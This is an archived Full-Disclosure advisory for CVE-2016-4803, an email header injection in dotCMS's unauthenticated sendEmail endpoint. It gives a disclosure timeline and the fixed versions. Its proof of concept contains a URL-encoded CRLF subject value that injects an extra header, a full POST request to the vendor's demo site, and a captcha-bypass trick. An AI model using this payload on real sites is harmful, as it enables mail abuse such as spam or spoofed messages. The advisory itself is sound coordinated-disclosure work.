lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 24 May 2016 23:57:50 +0300
From: Elar Lang <elarlang@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2016-4803 dotCMS - Email Header Injection

Title: CVE-2016-4803 dotCMS - Email Header Injection
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: Email Header Injection
Vulnerable version: before 3.5 / 3.3.2
CVE: CVE-2016-4803
Vendor: dotCMS (http://dotcms.com/)


# Description
dotCMS has an email sending functionality at path /dotCMS/sendEmail/
Some parameters are vulnerable to Email Header Injection.


# Preconditions
There is no pre-condition on authentication or on authorization to
access this functionality.

If captcha is required for the web page, then the only precondition
would be captcha. However, captcha is renewed only when you access the
captcha image - in other words, you can load it once and manually set
the correct value. After this step the "captcha effect" is bypassed.


# Proof-of-Concept
Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1
on 7th of December 2015.

## Value for subject (%0D%0A is for \r\n):
subject=subject%0D%0AX-PoC-of-New-Line%3A+True


## Proof-of-Concept POST request:
<code>
POST /dotCMS/sendEmail HTTP/1.1
Host: demo2.dotcms.com
...
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 218

from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send
</code>


## Received email source:
<code>
Message-ID: <1894336506.1449476889789.JavaMail.dotcms@...ocms1.dotcms.net>
From:  myemail
To: youremail
Subject: subject
X-PoC-of-New-Line: True
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="----=_Part_4_698773753.1449476889786"
X-RecipientId: null
Date: Mon,  7 Dec 2015 03:28:09 -0500 (EST)

------=_Part_4_698773753.1449476889786
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

... removed ...
</code>


## Result

>From the received email source, it is visible that the subject value
created 2 different lines:
<code>
Subject: subject
X-PoC-of-New-Line: True
</code>

Proof-of-Concept on how to send a multipart email with an attachment
and a more detailed description is available at:
https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html


# Vulnerability Disclosure Timeline

2015-12-04 .. 07 | me | detected vulnerability, wrote Proof-of-Concept
2015-12-07 | me > dotCMS | sent a letter with detailed description of
email header injection and some related vulnerabilities
2015-12-14 | me > dotCMS | sent another letter with SQL injections
vulnerabilities and asked feedback about "email header injection"
vulnerabilities
2015-12-14 | dotCMS > me | they were going to review my emails and
asked to resend "email header injection" description
2015-12-14 | me > dotCMS | I resent "email header injection" description
2015-12-14 | dotCMS > me | they were planning fixes in upcoming
release, estimated to beginning of 2016. They thanked and wrote
"security is something we take seriously"

2016-04-07 | me > dotCMS | 5 months since first report, what is the
situation with reported vulnerabilities?
2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by
sanitizing and email header injection #8841"
2016-04-07 | dotCMS > me | email header injection will be fixed in
3.5, which is estimated to be out in mid-April

2016-04-19 | dotCMS | dotCMS version 3.5 release
2016-05-09 | me > dotCMS | asked confirmation and version numbers
about fixes for CVE and Full Disclosure
2016-05-10 | dotCMS > me | email header injection is fixed in versions
3.5 and 3.3.2.
2016-05-10 | dotCMS | dotCMS version 3.3.2 release
2016-05-24 | me | Full Disclosure on security.elarlang.eu


# Fixes
Update dotCMS at least to version 3.5 or 3.3.2.

https://dotcms.com/docs/latest/change-log#release-3.5
https://dotcms.com/docs/latest/change-log#release-3.3.2

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ